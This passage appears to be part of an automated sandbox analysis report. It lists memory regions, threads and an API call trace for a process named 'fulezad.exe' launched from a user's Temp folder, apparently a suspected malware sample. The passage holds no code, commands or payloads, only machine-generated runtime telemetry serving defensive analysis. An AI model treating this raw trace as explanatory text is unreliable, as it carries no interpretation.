"\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1834 start_va = 0x1880000 end_va = 0x188ffff entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 1835 start_va = 0x1890000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 1836 start_va = 0x18a0000 end_va = 0x18affff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 1837 start_va = 0x1930000 end_va = 0x1937fff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 1838 start_va = 0x1940000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 1839 start_va = 0x1d20000 end_va = 0x1d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d20000" filename = "" Region: id = 1840 start_va = 0x1d30000 end_va = 0x1d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d30000" filename = "" Region: id = 1841 start_va = 0x1d40000 end_va = 0x1d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 1842 start_va = 0x1d50000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d50000" filename = "" Region: id = 1843 start_va = 0x1d60000 end_va = 0x1d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 1844 start_va = 0x1d70000 end_va = 0x1d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d70000" filename = "" Region: id = 1845 start_va = 0x1e00000 end_va = 0x1e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 1846 start_va = 0x1e10000 end_va = 0x1e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 1847 start_va = 0x1e20000 end_va = 0x1e2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 1848 start_va = 0x1e30000 end_va = 0x1e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 1849 start_va = 0x1e40000 end_va = 0x1e4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 1850 start_va = 0x1e50000 end_va = 0x1e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 1851 start_va = 0x27a0000 end_va = 0x27dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 1852 start_va = 0x27e0000 end_va = 0x281ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 1853 start_va = 0x2f60000 end_va = 0x301ffff entry_point = 0x2f60000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1854 start_va = 0x3770000 end_va = 0x37effff entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1855 start_va = 0x3fe0000 end_va = 0x405ffff entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 1856 start_va = 0x4ac0000 end_va = 0x4bbffff entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 1857 start_va = 0x4c00000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1858 start_va = 0x4d00000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 1859 start_va = 0x4e00000 end_va = 0x4efffff entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 1860 start_va = 0x4f00000 end_va = 0x4ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f00000" filename = "" Region: id = 1861 start_va = 0x5000000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1862 start_va = 0x5100000 end_va = 0x60fffff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 1863 start_va = 0x61a0000 end_va = 0x621ffff entry_point = 0x0 region_type = private name = "private_0x00000000061a0000" filename = "" Region: id = 1864 start_va = 0x6270000 end_va = 0x62effff entry_point = 0x0 region_type = private name = "private_0x0000000006270000" filename = "" Region: id = 1865 start_va = 0x6310000 end_va = 0x638ffff entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 1866 start_va = 0x7fef5250000 end_va = 0x7fef5264fff entry_point = 0x7fef5250000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1867 start_va = 0x7fffff50000 end_va = 0x7fffff51fff entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 1868 start_va = 0x7fffff52000 end_va = 0x7fffff53fff entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 1869 start_va = 0x7fffff54000 end_va = 0x7fffff55fff entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 1870 start_va = 0x7fffff56000 end_va = 0x7fffff57fff entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 2594 start_va = 0x3110000 end_va = 0x318ffff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 2595 start_va = 0x7fee32d0000 end_va = 0x7fee34a3fff entry_point = 0x7fee32d0000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 2979 start_va = 0xde0000 end_va = 0xde0fff entry_point = 0xde0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 2980 start_va = 0xdf0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 2981 start_va = 0x2db0000 end_va = 0x2e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 2982 start_va = 0x4160000 end_va = 0x41dffff entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 2983 start_va = 0x6370000 end_va = 0x63effff entry_point = 0x0 region_type = private name = "private_0x0000000006370000" filename = "" Region: id = 2984 start_va = 0x63f0000 end_va = 0x67effff entry_point = 0x0 region_type = private name = "private_0x00000000063f0000" filename = "" Region: id = 2985 start_va = 0x7fef7fa0000 end_va = 0x7fef801bfff entry_point = 0x7fef7fa0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Thread: id = 36 os_tid = 0xb24 Thread: id = 37 os_tid = 0xb20 Thread: id = 38 os_tid = 0xb1c Thread: id = 39 os_tid = 0xb18 Thread: id = 40 os_tid = 0xb14 Thread: id = 41 os_tid = 0xb10 Thread: id = 42 os_tid = 0xb0c Thread: id = 43 os_tid = 0xb08 Thread: id = 44 os_tid = 0xb04 Thread: id = 45 os_tid = 0xb00 Thread: id = 46 os_tid = 0xafc Thread: id = 47 os_tid = 0xaf8 Thread: id = 48 os_tid = 0x554 Thread: id = 49 os_tid = 0x568 Thread: id = 50 os_tid = 0x420 Thread: id = 51 os_tid = 0x7e4 Thread: id = 52 os_tid = 0x7dc Thread: id = 53 os_tid = 0x7d8 Thread: id = 54 os_tid = 0x784 Thread: id = 55 os_tid = 0x75c Thread: id = 56 os_tid = 0x748 Thread: id = 57 os_tid = 0x744 Thread: id = 58 os_tid = 0x738 Thread: id = 59 os_tid = 0x71c Thread: id = 60 os_tid = 0x700 Thread: id = 61 os_tid = 0x6fc Thread: id = 62 os_tid = 0x6f4 Thread: id = 63 os_tid = 0x6a8 Thread: id = 64 os_tid = 0x4c4 Thread: id = 65 os_tid = 0x488 Thread: id = 66 os_tid = 0x47c Thread: id = 67 os_tid = 0x478 Thread: id = 68 os_tid = 0x458 Thread: id = 69 os_tid = 0x444 Thread: id = 70 os_tid = 0x30c Thread: id = 71 os_tid = 0x294 Thread: id = 72 os_tid = 0x1e0 Thread: id = 73 os_tid = 0x3f8 Thread: id = 74 os_tid = 0x3ec Thread: id = 75 os_tid = 0x3e0 Thread: id = 76 os_tid = 0x388 Thread: id = 77 os_tid = 0x384 Thread: id = 78 os_tid = 0x380 Thread: id = 79 os_tid = 0x37c Thread: id = 80 os_tid = 0x374 Thread: id = 81 os_tid = 0x36c Thread: id = 84 os_tid = 0xb94 Thread: id = 85 os_tid = 0xb98 Thread: id = 86 os_tid = 0x268 Thread: id = 89 os_tid = 0x838 Thread: id = 90 os_tid = 0x848 Thread: id = 91 os_tid = 0x858 Thread: id = 92 os_tid = 0x868 Thread: id = 93 os_tid = 0x878 Thread: id = 94 os_tid = 0x888 Thread: id = 95 os_tid = 0x3bc Thread: id = 96 os_tid = 0x3ac Thread: id = 97 os_tid = 0x6f8 Thread: id = 98 os_tid = 0x7a4 Thread: id = 99 os_tid = 0x4f4 Thread: id = 100 os_tid = 0x7c4 Thread: id = 101 os_tid = 0x244 Thread: id = 121 os_tid = 0x8d0 Thread: id = 124 os_tid = 0x8e0 Thread: id = 165 os_tid = 0xb0c Thread: id = 166 os_tid = 0x7a0 Thread: id = 167 os_tid = 0x7ac Thread: id = 168 os_tid = 0xb9c Thread: id = 169 os_tid = 0xbb4 Thread: id = 170 os_tid = 0xbd8 Thread: id = 180 os_tid = 0x4e0 Thread: id = 212 os_tid = 0xac8 Thread: id = 305 os_tid = 0x6fc Thread: id = 315 os_tid = 0x250 Thread: id = 316 os_tid = 0xb40 Thread: id = 325 os_tid = 0x448 Thread: id = 326 os_tid = 0x5b0 Thread: id = 366 os_tid = 0xb84 Process: id = "4" image_name = "fulezad.exe" filename = "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe" page_root = "0x3b7bc000" os_pid = "0x8e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xac8" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1138 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1139 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1140 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1141 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1142 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1143 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1144 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1145 start_va = 0x400000 end_va = 0x479fff entry_point = 0x400000 region_type = mapped_file name = "fulezad.exe" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe") Region: id = 1146 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1147 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1148 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1149 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1150 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1151 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1152 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1153 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1154 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1155 start_va = 0x250000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1156 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1157 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1158 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1159 start_va = 0x520000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1160 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1161 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1162 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1163 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 1164 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1165 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1166 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1167 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1168 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1169 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1170 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1171 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1172 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1173 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1174 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1175 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1176 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1177 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1178 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1179 start_va = 0x620000 end_va = 0x7a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1180 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1181 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1182 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1183 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1184 start_va = 0x7b0000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 1185 start_va = 0x940000 end_va = 0x1d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1186 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1187 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1188 start_va = 0x2d0000 end_va = 0x314fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1189 start_va = 0x320000 end_va = 0x348fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1190 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1208 start_va = 0x1d40000 end_va = 0x1e7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1209 start_va = 0x1e80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1210 start_va = 0x1d40000 end_va = 0x1e7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1211 start_va = 0x1e80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1212 start_va = 0x1d40000 end_va = 0x1e7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1213 start_va = 0x1e80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1215 start_va = 0x1d40000 end_va = 0x1e7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1216 start_va = 0x1e80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1217 start_va = 0x350000 end_va = 0x37afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1218 start_va = 0x1d40000 end_va = 0x1e7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1219 start_va = 0x1e80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1220 start_va = 0x1d40000 end_va = 0x1e7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1221 start_va = 0x1e80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1243 start_va = 0x1d40000 end_va = 0x1e7bfff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1244 start_va = 0x1e80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Thread: id = 103 os_tid = 0x8e8 [0084.939] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xd92237d0, dwHighDateTime=0x1d4be3a)) [0084.939] GetCurrentThreadId () returned 0x8e8 [0084.939] GetTickCount64 () returned 0x239e4 [0084.939] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1816231100000) returned 1 [0084.939] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x777dfd35, hStdError=0x77847daf)) [0084.940] GetCurrentThreadId () returned 0x8e8 [0084.940] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0084.940] GetEnvironmentStringsW () returned 0x5323d0* [0084.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1525, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1525 [0084.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1525, lpMultiByteStr=0x532fc8, cbMultiByte=1525, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1525 [0084.940] FreeEnvironmentStringsW (penv=0x5323d0) returned 1 [0084.940] GetLastError () returned 0x5 [0084.941] SetLastError (dwErrCode=0x5) [0084.941] GetLastError () returned 0x5 [0084.941] SetLastError (dwErrCode=0x5) [0084.941] GetLastError () returned 0x5 [0084.941] SetLastError (dwErrCode=0x5) [0084.941] GetACP () returned 0x4e4 [0084.941] GetLastError () returned 0x5 [0084.941] SetLastError (dwErrCode=0x5) [0084.941] IsValidCodePage (CodePage=0x4e4) returned 1 [0084.941] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0084.941] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9a4 | out: lpCPInfo=0x18f9a4) returned 1 [0084.941] GetLastError () returned 0x5 [0084.941] SetLastError (dwErrCode=0x5) [0084.941] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0084.941] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f728, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0084.941] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9b8 | out: lpCharType=0x18f9b8) returned 1 [0084.941] GetLastError () returned 0x5 [0084.941] SetLastError (dwErrCode=0x5) [0084.941] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0084.941] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0084.941] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 